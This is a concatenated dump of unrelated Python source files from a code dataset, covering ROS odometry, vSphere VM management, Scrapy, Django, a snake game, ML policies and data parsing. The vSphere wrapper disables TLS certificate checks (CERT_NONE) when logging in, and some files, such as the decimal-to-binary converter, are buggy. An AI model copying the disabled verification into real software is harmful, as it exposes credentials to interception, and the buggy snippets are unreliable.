ModelStates\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import TwistWithCovariance\nfrom geometry_msgs.msg import PoseWithCovariance\nimport numpy as np\n\nclass OdometryPublisher:\n\tdef __init__(self):\n\t\trospy.init_node('OdometryPublisher')\n\t\t#self.odometry_pub = rospy.Publisher(rospy.get_namespace()+'odom',Odometry,queue_size=1)\n\t\tself.odometry_pub = rospy.Publisher('/odom',Odometry,queue_size=1)\n\t\tself.model_state_sub = rospy.Subscriber('/gazebo/model_states',ModelStates,self.publish_odometry)\n\n\n\tdef publish_odometry(self,msg):\n\t\tself.msg = msg\n\t\tfor i in xrange(0,len(msg.name)):\n\t\t\tif(msg.name[i]==rospy.get_namespace()[1:len(rospy.get_namespace())-1]):\n\t\t\t\tpose = PoseWithCovariance()\n\t\t\t\ttwist = TwistWithCovariance()\n\t\t\t\tpose.pose = msg.pose[i]\n\t\t\t\tpose.pose.position.z=0\n\n\t\t\t\ttwist.twist.angular.z = msg.twist[i].angular.z\n\n\t\t\t\trot_matrix = tf.transformations.quaternion_matrix([msg.pose[i].orientation.x,msg.pose[i].orientation.y,msg.pose[i].orientation.z,msg.pose[i].orientation.w])\n\t\t\t\tlin_vel = np.matrix([msg.twist[i].linear.x,msg.twist[i].linear.y,msg.twist[i].linear.z])\n\n\t\t\t\tmy_vel = rot_matrix[0:3,0:3].T*lin_vel.T\n\n\t\t\t\txdot = my_vel.tolist()[0][0]\n\n\t\t\t\ttwist.twist.linear.x = xdot\n\n\t\t\t\t# Fill the Odometry message\n\t\t\t\todom_msg = Odometry()\n\t\t\t\todom_msg.pose = pose\n\t\t\t\todom_msg.twist = twist\n\t\t\t\todom_msg.header.frame_id='/odom'\n\t\t\t\todom_msg.child_frame_id=msg.name[i]\n\t\t\t\todom_msg.header.stamp = rospy.Time.now()\n\n\t\t\t\t# Publish the Odometry message\n\t\t\t\t#self.odometry_pub.publish(odom_msg)\n\n\nif __name__=='__main__':\n\tpublisher = OdometryPublisher()\n\trospy.spin()\n","sub_path":"momapbot/momapbot_gazebo/src/odometrypublisher.py","file_name":"odometrypublisher.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"227784331","text":"import ssl, collections, time\r\n\r\nfrom pyVmomi import vim, vmodl\r\nfrom pyVim.connect import SmartConnect, Disconnect\r\n\r\n\r\nclass vCenter(object):\r\n NEVER_CLOSE = -1\r\n\r\n @property\r\n def serviceContent(self):\r\n return self.__serviceContent\r\n \r\n def __init__(self, server, user, pw):\r\n try:\r\n s = ssl.SSLContext()\r\n s.verify_mode = ssl.CERT_NONE\r\n self.__serviceInstance = SmartConnect(\r\n host = server,\r\n user = user,\r\n pwd = pw,\r\n connectionPoolTimeout = vCenter.NEVER_CLOSE,\r\n sslContext = s\r\n )\r\n self.__serviceContent = self.__serviceInstance.RetrieveContent()\r\n self.__searchIndex = self.__serviceContent.searchIndex\r\n self.__rootFolder = self.__serviceContent.rootFolder\r\n self.__viewManager = self.__serviceContent.viewManager\r\n except vmodl.MethodFault as fault:\r\n raise Exception(fault.msg)\r\n except Exception:\r\n raise\r\n\r\n @property\r\n def sessionsNum(self):\r\n if self.__serviceContent:\r\n return len(self.__serviceContent.sessionManager.sessionList)\r\n else:\r\n return None\r\n\r\n def __del__(self):\r\n try:\r\n Disconnect(self.__serviceInstance)\r\n except vmodl.MethodFault:\r\n raise\r\n except Exception:\r\n raise\r\n\r\n def _findAllObjByType(self, vimtype, folder = None):\r\n try:\r\n if folder is None:\r\n folder = self.__rootFolder\r\n container = self.__viewManager.CreateContainerView(folder, vimtype, True)\r\n obj_list = container.view\r\n except vmodl.MethodFault:\r\n raise\r\n except Exception:\r\n raise \r\n return obj_list\r\n\r\n def findObjByName(self, name, objSet = None, vimtype = None):\r\n \"\"\"If there are multiple object with the same name, \r\n this method will return the first one it found\"\"\"\r\n if objSet is None:\r\n objSet = self.__rootFolder\r\n result = None\r\n obj_list = None\r\n if isinstance(objSet, vim.Folder):\r\n if vimtype is None:\r\n raise Exception(\"vimtype is None, it must be specified to find in a folder\")\r\n obj_list = self._findAllObjByType(vimtype, objSet)\r\n elif isinstance(objSet, collections.Iterable):\r\n obj_list = objSet\r\n for obj in obj_list:\r\n if obj.name == name:\r\n result = obj\r\n break\r\n return result\r\n\r\n def findObjByInventoryPath(self, path):\r\n \"\"\"For VM, path should be //vm/\"\"\"\r\n result = self.__searchIndex.FindByInventoryPath(path)\r\n return result\r\n\r\n def findAvailableDatacenters(self, folder = None):\r\n available_dcs = self._findAllObjByType([vim.Datacenter], folder)\r\n return available_dcs\r\n\r\n def findAvailableHosts(self, datacenter):\r\n dc = self.findObjByName(datacenter, vimtype = [vim.Datacenter])\r\n available_hosts = self._findAllObjByType([vim.HostSystem], dc.hostFolder)\r\n return available_hosts\r\n\r\n def findAvailableDatastoresForHost(self, host_name):\r\n host = self.findObjByName(host_name, vimtype = [vim.HostSystem])\r\n return host.datastore\r\n\r\n def findAvailableNetworkForHost(self, host_name):\r\n host = self.findObjByName(host_name, vimtype = [vim.HostSystem])\r\n return host.network\r\n\r\n def findVmByBiosUuid(self, biosuuid, datacenter = None):\r\n result = self.__searchIndex.FindByUuid(datacenter, biosuuid, True, False)\r\n return result\r\n\r\n def findVmByInstanceUuid(self, instanceuuid, datacenter = None):\r\n result = self.__searchIndex.FindByUuid(datacenter, instanceuuid, True, True)\r\n return result\r\n\r\n def findVmByComputerName(self, computername, datacenter = None):\r\n result = self.__searchIndex.FindByDnsName(datacenter, computername, True)\r\n return result\r\n\r\n def findVmByIp(self, ip, datacenter = None):\r\n result = self.__searchIndex.FindByIp(datacenter, ip, True)\r\n return result\r\n\r\n def getshareStore(self,type,name=None):\r\n obj=None\r\n container=self.__serviceContent.viewManager.CreateContainerView(self.__serviceContent.rootFolder,type,True)\r\n if name:\r\n for view in container.view:\r\n if view.name==name:\r\n obj=view\r\n return [obj]\r\n else:\r\n return container.view\r\n\r\nclass Host(object):\r\n @property\r\n def instance(self):\r\n return self.__instance\r\n\r\n @instance.setter\r\n def instance(self, value):\r\n if not isinstance(value, vim.HostSystem):\r\n raise ValueError('instance must be a vim.HostSystem')\r\n self.__instance = value\r\n self.__hardware = self.__instance.hardware\r\n self.__stats = self.__instance.summary.quickStats\r\n\r\n @property\r\n def name(self):\r\n if self.__instance:\r\n return self.__instance.name\r\n\r\n @property\r\n def id(self):\r\n if self.__instance:\r\n return int(self.__instance._moId.split('-')[1])\r\n\r\n @property\r\n def cpu_hz(self):\r\n if self.__instance:\r\n return self.__hardware.cpuInfo.numCpuCores * self.__hardware.cpuInfo.hz\r\n\r\n @property\r\n def cpu_usage_mhz(self):\r\n if self.__stats:\r\n return self.__stats.overallCpuUsage\r\n\r\n @property\r\n def memory_bytes(self):\r\n if self.__hardware:\r\n return self.__hardware.memorySize\r\n\r\n @property\r\n def memory_usage_mb(self):\r\n if self.__stats:\r\n return self.__stats.overallMemoryUsage\r\n\r\nclass VirtualMachine(object):\r\n \r\n @property\r\n def instance(self):\r\n return self.__instance\r\n\r\n @instance.setter\r\n def instance(self, value):\r\n if not isinstance(value, vim.VirtualMachine):\r\n raise ValueError('instance must be a vim.VirtualMachine')\r\n self.__instance = value\r\n\r\n @property\r\n def name(self):\r\n if self.__instance:\r\n return self.__instance.name\r\n\r\n @property\r\n def powerState(self):\r\n if self.__instance:\r\n return self.__instance.runtime.powerState\r\n else:\r\n return None\r\n\r\n @property\r\n def instance_uuid(self):\r\n if self.__instance:\r\n return self.__instance.config.instanceUuid\r\n else:\r\n return None\r\n\r\n @property\r\n def bios_uuid(self):\r\n if self.__instance:\r\n return self.__instance.config.uuid\r\n else:\r\n return None\r\n\r\n @property\r\n def isTemplate(self):\r\n if self.__instance:\r\n return self.__instance.config.template\r\n else:\r\n return None\r\n\r\n @property\r\n def datastore(self):\r\n if self.__instance:\r\n return self.__instance.datastore\r\n else:\r\n return None\r\n\r\n @property\r\n def current_snapshot(self):\r\n if self.__instance and self.__instance.snapshot:\r\n return self.__instance.snapshot.currentSnapshot\r\n else:\r\n return None\r\n\r\n def getSnapshotByName(self, snapshot_name, snapshotList = None):\r\n target = None\r\n if self.__instance.snapshot is None:\r\n return target\r\n if snapshotList is None:\r\n snapshotList = self.__instance.snapshot.rootSnapshotList\r\n for snap in snapshotList:\r\n if snap.name == snapshot_name:\r\n target = snap.snapshot\r\n break\r\n elif snap.childSnapshotList:\r\n self.getSnapshotByName(snapshot_name, snap.childSnapshotList)\r\n return target\r\n\r\n def __wait_for_vm_task_result(self, task):\r\n while True:\r\n if task.info.state in [vim.TaskInfo.State.running, vim.TaskInfo.State.queued]:\r\n pass\r\n elif task.info.state == vim.TaskInfo.State.success:\r\n return 0, task.info.result\r\n elif task.info.state == vim.TaskInfo.State.error:\r\n return 1, task.info.error.msg\r\n time.sleep(5)\r\n\r\n def powerOn(self):\r\n if self.__instance and self.powerState != vim.VirtualMachine.PowerState.poweredOn:\r\n return self.__wait_for_vm_task_result(self.__instance.PowerOnVM_Task())\r\n\r\n def powerOff(self):\r\n if self.__instance and self.powerState != vim.VirtualMachine.PowerState.poweredOff:\r\n return self.__wait_for_vm_task_result(self.__instance.PowerOffVM_Task())\r\n\r\n def suspend(self):\r\n if self.__instance and self.powerState == vim.VirtualMachine.PowerState.poweredOn:\r\n return self.__wait_for_vm_task_result(self.__instance.SuspendVM_Task())\r\n\r\n def removeAllSnapshots(self):\r\n return self.__wait_for_vm_task_result(self.__instance.RemoveAllSnapshots_Task())\r\n\r\n def clone(self, folder, name, host = None, datastore = None, snapshot_name = None, poweron = False, template = False):\r\n clone_spec = vim.vm.CloneSpec()\r\n # Specifies the location of resources the newly cloned virtual machine will use\r\n relocate_spec = vim.vim.RelocateSpec()\r\n relocate_spec.host = host\r\n relocate_spec.datastore = datastore\r\n\r\n # Get the snapshot for linked clone\r\n base_snapshot = self.getSnapshotByName(snapshot_name) if snapshot_name else self.current_snapshot\r\n if base_snapshot is not None:\r\n clone_spec.snapShot = base_snapshot\r\n relocate_spec.diskMoveType = \"createNewChildDiskBacking\"\r\n clone_spec.location = relocate_spec\r\n\r\n # Don't retain a copy of the source vm's memory state in the clone\r\n clone_spec.memory = False\r\n clone_spec.powerOn = poweron\r\n clone_spec.template = template\r\n return self.__wait_for_vm_task_result(self.__instance.CloneVM_Task(folder, name, clone_spec))\r\n\r\n def setConfigParams(self, configParams):\r\n if self.__instance\\\r\n and not self.isTemplate\\\r\n and self.powerState == vim.VirtualMachine.PowerState.poweredOff:\r\n config_spec = vim.vm.ConfigSpec()\r\n config_spec.extraConfig = []\r\n \r\n for key, value in configParams.items():\r\n options = vim.option.OptionValue()\r\n options.key = key\r\n options.value = value\r\n config_spec.extraConfig.append(options)\r\n\r\n return self.__wait_for_vm_task_result(self.__instance.ReconfigVM_Task(config_spec))\r\n\r\n def delete(self):\r\n if self.powerState == vim.VirtualMachinePowerState.poweredOn:\r\n self.powerOff()\r\n return self.__wait_for_vm_task_result(self.__instance.Destroy_Task())","sub_path":"KasonPython/vsphere.py","file_name":"vsphere.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"217587300","text":"from scrapy.commands.crawl import Command\nfrom scrapy.exceptions import UsageError\n# from scrapy.extensions.closespider import CloseSpider\n# from scrapy.exceptions import CloseSpider\n\n\nclass CrawlCommand(Command):\n def run(self, args, opts):\n if len(args) < 1:\n raise UsageError()\n elif len(args) > 1:\n raise UsageError(\"running 'scrapy crawl' with more than one spider is no longer supported\")\n spname = args[0]\n\n self.crawler_process.crawl(spname, **opts.spargs)\n\n crawler = list(self.crawler_process.crawlers)[0]\n crawler.stats.set_value('exit_code', 0)\n\n self.crawler_process.start()\n\n exitcode = crawler.stats.get_value('exit_code')\n if exitcode != 0:\n if isinstance(exitcode, int):\n self.exitcode = exitcode\n else:\n self.exitcode = 1\n","sub_path":"GGScrapy/commands/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"623786584","text":"from django.db.models import signals\nimport handler\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.conf import settings\nfrom django.utils.translation import activate, deactivate\nfrom django.db import models\n\nsignals.post_init.connect(handler.post_init)\n\n\nclass TranslationModel(models.Model):\n def __init__(self, *args, **kwargs):\n\n _languages = dict(filter(lambda x: x[0] != getattr(settings, 'LINGUA_DEFAULT', 'en'),\n getattr(settings, 'LANGUAGES', ())))\n translation_fields = tuple([x for x in [x.lower() for x in self._translation_fields if '__' not in x]])\n\n def _getattr(klass, name):\n if '_' in name:\n lang, v = name.split('_')[::-1][0], '_'.join(name.split('_')[:-1])\n\n if lang in _languages:\n activate(lang)\n value = unicode(_(getattr(klass, v)))\n deactivate()\n\n return value\n return klass.__class__.__getattribute__(klass, name)\n\n self.__class__.add_to_class('_translation_fields', translation_fields)\n self.__class__.add_to_class('_languages', _languages)\n self.__class__.add_to_class('__getattr__', _getattr)\n\n super(TranslationModel, self).__init__(*args, **kwargs)\n\n class Meta:\n abstract = True\n","sub_path":"lingua/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"455375004","text":"from pygame import display, init, time as pytime, font, draw, event, quit as pyquit\nfrom pygame import QUIT, KEYDOWN, K_LEFT, K_RIGHT, K_DOWN, K_UP, K_s, K_j\nimport random\nfrom PIL import ImageColor\n\ninit()\n\nbranco = ImageColor.getrgb(\"white\")\namarelo = ImageColor.getrgb(\"yellow\")\npreto = ImageColor.getrgb(\"black\")\nvermelho = ImageColor.getrgb(\"red\")\nverde = ImageColor.getrgb(\"green\")\nazul = ImageColor.getrgb(\"blue\")\n\nlargura = 600\naltura = 400\n\ndis = display.set_mode((largura, altura))\ndisplay.set_caption(\"JOGO\")\n\nclock = pytime.Clock()\nsnake_body = 10\n\nscore = lambda s : dis.blit(\n font.SysFont(\"arial.ttf\", 35).render(\n f\"Pontuação: {s-1}\", True, azul\n ), [0,0]\n )\n\nmessage = lambda m, c, pos : dis.blit(\n font.SysFont(\n \"segol UI\"\n , 25\n ).render(m,True,c)\n , pos\n )\n\ncriar_comida = lambda esp, pos : round(random.randrange(esp, pos - 10)/10)*10\n\ndef jogo():\n game_over = False\n fechar = False\n\n x1 = largura/2\n y1 = altura/2\n\n x1_change = 0\n y1_change = 0\n\n corpo = []\n tamanho = 1\n level = 10\n\n comida_x = criar_comida(0, largura)\n comida_y = criar_comida(30, altura)\n\n while not game_over:\n while fechar:\n dis.fill(branco)\n message(\"Aperte J para jogar ou S para sair.\", preto, [50,100])\n score(tamanho)\n display.update()\n\n for e in event.get():\n if e.type == KEYDOWN:\n if e.type == QUIT:\n game_over = True\n fechar = False\n if e.key == K_s:\n game_over = True\n fechar = False\n if e.key == K_j:\n jogo()\n\n for e in event.get():\n if e.type == QUIT:\n game_over = True\n if e.type == KEYDOWN:\n if e.key == K_LEFT:\n x1_change =- snake_body\n y1_change = 0\n if e.key == K_RIGHT:\n x1_change = snake_body\n y1_change = 0\n if e.key == K_UP:\n y1_change =- snake_body\n x1_change = 0\n if e.key == K_DOWN:\n y1_change = snake_body\n x1_change = 0\n\n if any([x1>=largura, x1<0, y1>=altura, y1<0]):\n fechar = True\n\n x1 += x1_change\n y1 += y1_change\n dis.fill(branco)\n draw.rect(dis, vermelho, [comida_x, comida_y, snake_body, snake_body])\n cabeca = []\n cabeca.append(x1)\n cabeca.append(y1)\n corpo.append(cabeca)\n if len(corpo) > tamanho:\n del corpo[0]\n\n for x in corpo[:-1]:\n if x == cabeca:\n fechar = True\n\n [draw.rect(dis, verde, [x[0], x[1], snake_body, snake_body]) for x in corpo]\n score(tamanho)\n\n if x1 == comida_x and y1 == comida_y:\n comida_x = criar_comida(0, largura)\n comida_y = criar_comida(30, altura)\n tamanho += 1\n level += 2\n clock.tick(level)\n\n pyquit()\n quit()\n\njogo()\n","sub_path":"JOGO_CLASSICO.py","file_name":"JOGO_CLASSICO.py","file_ext":"py","file_size_in_byte":3295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444051886","text":"import requests, re \nimport lxml \nimport urllib3\nfrom bs4 import BeautifulSoup \nagents = {\n\t'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n}\n\ndef scrape(url):\n\tget_page_data = requests.get(url, headers=agents)\n\treturn BeautifulSoup(get_page_data.text, 'lxml')\n\nsoup = scrape('https://techcrunch.com/')\n\ndata = soup.findAll('a')[:2]\nfor d in data:\n\tif 'href' in d.attrs:\n\t\tprint(d.attrs['href'])\n\n# # lambda expression\n# data = soup.findAll(lambda tag: len(tag.attrs) == 2)[:2]\n# print(data)\n# regular expression\n# images = soup.findAll('img',{'src': re.compile('\\.\\.\\/img\\/gifts\\/img.*\\.jpg')})\n# for i in images:\n# \tprint(i[\"src\"])","sub_path":"study.py","file_name":"study.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"488704586","text":"#!/usr/bin/env python3\n# License: MIT\n\n'''\nA discourse segmenter following the Base model from this paper:\nNgo Xuan Bach, Nguyen Le Minh, Akira Shimazu. 2012.\nA Reranking Model for Discourse Segmentation using Subtree Features.\nSIGDIAL. http://aclweb.org/anthology//W/W12/W12-1623.pdf.\n\nThe output can be fed into CRF++ to train a model\nwith tune_segmentation_model.py.\n'''\n\nimport argparse\nimport json\nfrom discourseparsing.discourse_segmentation \\\n import extract_segmentation_features\n\n\ndef main():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n 'input_path', help='JSON file from convert_rst_discourse_tb.py')\n parser.add_argument(\n 'output_path', help='TSV output file to be used by crf++')\n args = parser.parse_args()\n\n with open(args.input_path) as f:\n data = json.load(f)\n\n with open(args.output_path, 'w') as outfile:\n for doc in data:\n feat_lists_doc, labels_doc = extract_segmentation_features(doc)\n for feat_lists_sent, labels_sent in zip(feat_lists_doc, labels_doc):\n for feat_list, label in zip(feat_lists_sent, labels_sent):\n print('\\t'.join(feat_list + [label]), file=outfile)\n # blank lines between sentences (and documents)\n print(file=outfile)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"discourseparsing/extract_segmentation_features.py","file_name":"extract_segmentation_features.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"463339709","text":"import tensorflow as tf\nimport numpy as np\nfrom distributions import DiagGaussian\nfrom networks import MLP\nfrom optimizers import ClipPPO\n\nclass GaussianMLPPolicy:\n def __init__(\n self,\n name,\n ob_dim,\n action_dim,\n learn_vars=True,\n var_network=False, # NN if true, else trainable params indep of obs\n out_activation=None,\n hidden_dims=[64, 64, 64],\n hidden_activation=tf.nn.tanh,\n weight_init=tf.contrib.layers.xavier_initializer,\n bias_init=tf.zeros_initializer,\n optimizer=ClipPPO\n ):\n with tf.variable_scope(name):\n self.obs = tf.placeholder(tf.float32, shape=[None, ob_dim], name='obs')\n\n # policy net\n self.mean_network = MLP('means', ob_dim, action_dim, out_activation=out_activation, hidden_dims=hidden_dims, hidden_activation=hidden_activation, weight_init=weight_init, bias_init=bias_init, in_layer=self.obs)\n self.means = self.mean_network.layers['out']\n\n if learn_vars:\n if var_network:\n self.log_var_network = MLP('log_vars', ob_dim, action_dim, out_activation=out_activation, hidden_dims=hidden_dims, hidden_activation=hidden_activation, weight_init=weight_init, bias_init=bias_init, in_layer=self.obs)\n self.log_vars = self.log_var_network.layers['out']\n else:\n self.log_vars = tf.get_variable('log_vars', trainable=True, initializer=-np.ones((1, action_dim), dtype=np.float32))\n else:\n self.log_vars = tf.get_variable('log_vars', trainable=False, initializer=np.zeros((1, action_dim), dtype=np.float32))\n\n self.distribution = DiagGaussian(self.means, self.log_vars)\n self.sampled_actions = self.distribution.sample()\n\n self.actions = tf.placeholder(tf.float32, shape=[None, action_dim], name='actions')\n self.action_log_probs = self.distribution.log_prob(self.actions)\n self.entropies = self.distribution.entropy()\n\n # value net\n self.value_network = MLP('values', ob_dim, 1, out_activation=out_activation, hidden_dims=hidden_dims, hidden_activation=hidden_activation, weight_init=weight_init, bias_init=bias_init, in_layer=self.obs)\n self.values = self.value_network.layers['out']\n\n # training, PPO for now\n self.optimizer = optimizer(ob_dim, action_dim, self)\n\n def act(self, obs, global_session):\n actions = global_session.run(\n self.sampled_actions,\n feed_dict={self.obs: obs}\n )\n return actions\n\n def rollout_data(self, obs, actions, global_session):\n action_log_probs, values, entropies = global_session.run(\n [self.action_log_probs, self.values, self.entropies],\n feed_dict={self.obs: obs, self.actions: actions}\n )\n return action_log_probs, values, entropies\n","sub_path":"policies.py","file_name":"policies.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"493104554","text":"#\r\n# [63] Unique Paths II\r\n#\r\n# https://leetcode.com/problems/unique-paths-ii\r\n#\r\n# Medium (31.50%)\r\n# Total Accepted: \r\n# Total Submissions: \r\n# Testcase Example: '[[0]]'\r\n#\r\n# Follow up for \"Unique Paths\":\r\n#\r\n# Now consider if some obstacles are added to the grids. How many unique paths\r\n# would there be?\r\n#\r\n# An obstacle and empty space is marked as 1 and 0 respectively in the grid.\r\n#\r\n# For example,\r\n# There is one obstacle in the middle of a 3x3 grid as illustrated below.\r\n#\r\n# [\r\n# ⁠ [0,0,0],\r\n# ⁠ [0,1,0],\r\n# ⁠ [0,0,0]\r\n# ]\r\n#\r\n# The total number of unique paths is 2.\r\n#\r\n# Note: m and n will be at most 100.\r\n#\r\n\r\n\r\nclass Solution(object):\r\n def uniquePathsWithObstacles(self, obstacleGrid):\r\n \"\"\"\r\n :type obstacleGrid: List[List[int]]\r\n :rtype: int\r\n \"\"\"\r\n if not obstacleGrid or obstacleGrid[0][0] == 1:\r\n return 0\r\n\r\n m = len(obstacleGrid)\r\n n = len(obstacleGrid[0])\r\n dp = [[1] * n for _ in range(m)]\r\n\r\n for i in range(1, m):\r\n dp[i][0] = 0 if obstacleGrid[i][0] else dp[i - 1][0]\r\n for j in range(1, n):\r\n dp[0][j] = 0 if obstacleGrid[0][j] else dp[0][j - 1]\r\n\r\n for i in range(1, m):\r\n for j in range(1, n):\r\n dp[i][j] = 0 if obstacleGrid[i][j] else dp[i - 1][j] + dp[i][j - 1]\r\n\r\n return dp[-1][-1]\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sol = Solution()\r\n matrix = [\r\n [0, 0, 0],\r\n [0, 1, 0],\r\n [0, 1, 0]\r\n ]\r\n print(sol.uniquePathsWithObstacles(matrix))\r\n\r\n matrix = [[1]]\r\n print(sol.uniquePathsWithObstacles(matrix))\r\n","sub_path":"accepted/063.unique-paths-ii.py","file_name":"063.unique-paths-ii.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"112371978","text":"# coding=utf-8\n#!/usr/bin/env python\n\nfrom stack import stack\n\ndef dec2binari(nombre, base):\n r = stack()\n while nombre > 0:\n s = ' '\n rem = nombre / base\n r.push(rem) # FEM UNA PILA\n nombre /= base\n while len(s) != 0:\n s = s + str(r.top()) # TREIEM L'ELEMENT DE LA PILA\n r.pop()\n return s # RETORNEM LA PILA MODIFICADA.\n","sub_path":"2N S/INFORMÀTICA-2_1/EXERCICIS_CLASE/dec2binari.py","file_name":"dec2binari.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"49263252","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 25 20:45:30 2017\n\nScript that creates and processes a sample spectrum. The overallpath\nis the folder where any of the processed files are written out to. The path\nis the folder where all of the individual sample and background DFGs are saved.\n\nVarious lines can be commented/uncommented to write the data to file and/or\nplot it.\n\n1. Initialization imports the individual sample and background DFGs.\n\n2. Any cosmic rays are removed from the sample or background DFGs (see header of \nspectrum.py for details)\n\n3. The appropriate background dfg is subtracted from each sample DFG.\n\n4. Each individual DFG is padded with zeros. This occurs since they are all\nhorizontally shifted with respect to one another (the whole point of taking \nmultiple is to cover more frequency space), so they can be then be summed.\n\n5. These padded DFGs are then summed.\n\n6. The individual DFGs are then truncated according to the positions determined\nby the gold reference.\n\n7. These truncated DFGs are then summed.\n\n@author: pohno\n\"\"\"\n\nfrom spectrum import Spectrum\n\nimport os\n\n#path to where files are written to\noverallpath = '/Users/pohno/Box Sync/Science/Data/SFG/Solstice/11192017'\n\n#name where summedTruncatedData is written to\nname = 'flowrun2.txt'\n\n#path where the data is stored\npath = '/Users/pohno/Box Sync/Science/Data/SFG/Solstice/11192017/caf2_water/run2'\n\n#create object, loads each sample and background DFG\nspec = Spectrum(path)\n\n#change directory in case files are written \nos.chdir(overallpath)\n\n#plot pre cosmic ray removal\nspec.plotDFGs()\nspec.plotBGs()\n\n#remove cosmic rays\nspec.removeCRs(50)\n\n#plot after cosmic ray removal\nspec.plotDFGs()\nspec.plotBGs()\n\n#change directory in case files are written \nspec.subtractBGs()\n\n#plot after background subtraction\nspec.plotDFGs()\n\n#pad the dfgs with zeros so they align and can be summed up\nspec.padDFGs()\n\n#plot the full DFGs\nspec.plotFullDFGs()\n\n#sum the padded DFGs\nspec.sumFullDFGs()\n\n#write sum of padded DFGs to file\n#spec.writeSumDFG('flowrun2Raw.txt')\n\n#plot the sum of the DFGs\nspec.plotSumDFG()\n\n#truncate the DFGs according to the gold reference spectrum\nspec.truncateFullDFGs(gold)\n\n#plot the truncated DFGs\nspec.plotTruncatedDFGs()\n\n#summ the truncated DFGs\nspec.sumTruncatedDFGs()\n\n#plot the summed, truncated spectrum\nspec.plotSumTruncatedDFG()\n\n#write the summed, truncated spectrum to file\nspec.writeSumTruncatedDFG(name)","sub_path":"Python/importSample.py","file_name":"importSample.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461722228","text":"# 81: Crie um script onde a idade da pessoa e de 12 anos, se a idade,\n# for < 4: o preço = 0 se for < 18: preço = 5\n# senão: preço = 10 ,\n# por ultimo faça uma mensagem ‘Seu custo de admissão e $' concatenando com o preço,\n# converta o preço para str() use if-elif-else: explique.\n\nidade = 12\n\nif idade < 4:\n preco = 0\nelif idade < 18:\n preco = 4\nelse:\n preco = 10\n\nprint(\"Seu custo de admissão é R$ \" + str(preco) + \", para entrar.\")\n\n'''\nO codigo faz o print uma vez so, e usa a variavel no if-elif-else para saber o valor que deve ser\nexibido para o usuario, isso fica mais claro o codigo.\n'''","sub_path":"python_crash_course/chapter_05_if/desafio_0081.py","file_name":"desafio_0081.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"451635110","text":"from lxml import etree\n\nimport json\nimport os\n\nfrom cleanup.utils import check_file_exists\n\nXML_FILEPATH = '..\\\\dataset\\\\rowiki-20230501-pages-meta-current.xml\\\\rowiki-20230501-pages-meta-current.xml'\nARTICLES_FILEPATH = '..\\\\articles.json'\n\n\n\n\n# function that parses a large xml file and prints out the top level tags\ndef parse_xml_file(filepath):\n if check_file_exists(filepath):\n context = etree.iterparse(filepath, events=('start', 'end'))\n for event, elem in context:\n if event == 'start':\n print(elem.tag)\n elem.clear()\n else:\n print(\"File does not exist\")\n\n\n\n# function that recursively prints the xml subtags of a given xml tag by using lxml\n# try to print it in a more readable way by keeping track of the depth of the tag\ndef print_subtags(tag, depth=0):\n print(' ' * depth + tag.tag.removeprefix('{http://www.mediawiki.org/xml/export-0.10/}')) \n #if(tag.text):\n # print(' ' * depth + tag.text)\n for child in tag:\n print_subtags(child, depth + 1)\n\n\n\n# function that parses a large xml file and reads all the tags with a given tag name\n# for each tag identified it searches for another two subtags named text, title and saves the text in an object\ndef parse_xml_contents(filepath):\n if check_file_exists(filepath):\n wikia_content = []\n\n context = etree.iterparse(filepath, events=('end',), tag='{http://www.mediawiki.org/xml/export-0.10/}page')\n # add a filter if the tag is not in the list of tags\n\n # add a counter to each article and print it\n counter = 0\n\n for event, elem in context:\n title = elem.find('{http://www.mediawiki.org/xml/export-0.10/}title').text\n try:\n content = elem.find('{http://www.mediawiki.org/xml/export-0.10/}revision/{http://www.mediawiki.org/xml/export-0.10/}text').text\n except:\n print(elem)\n print(elem.tag)\n for event,elem in context.children:\n print(f\"{event} - {elem.tag}\")\n raise Exception(\"No content found\")\n wikia_article = {\n 'title': title,\n 'content': content\n }\n wikia_content.append(wikia_article)\n\n counter +=1\n if(counter % 1000 == 0):\n print(counter)\n #print('the content of the article is:')\n #print(wikia_content)\n #break\n \n return wikia_content\n\n else:\n print(\"File does not exist\")\n\n\n# write the articles to a file\ndef write_articles_to_file(filepath, articles):\n if not os.path.isfile(filepath):\n with open(filepath, 'w') as f:\n json.dump(articles, f, indent=4)\n else:\n print(\"File already exists\")\n\n# function that parses al arge xml file and prints the content of the tag with the given name\ndef parse_xml_file_tags(filepath, tags):\n if check_file_exists(filepath):\n context = etree.iterparse(filepath, events=('start', 'end'))\n # add a filter if the tag is not in the list of tags\n for event, elem in context: \n if event == 'start' and 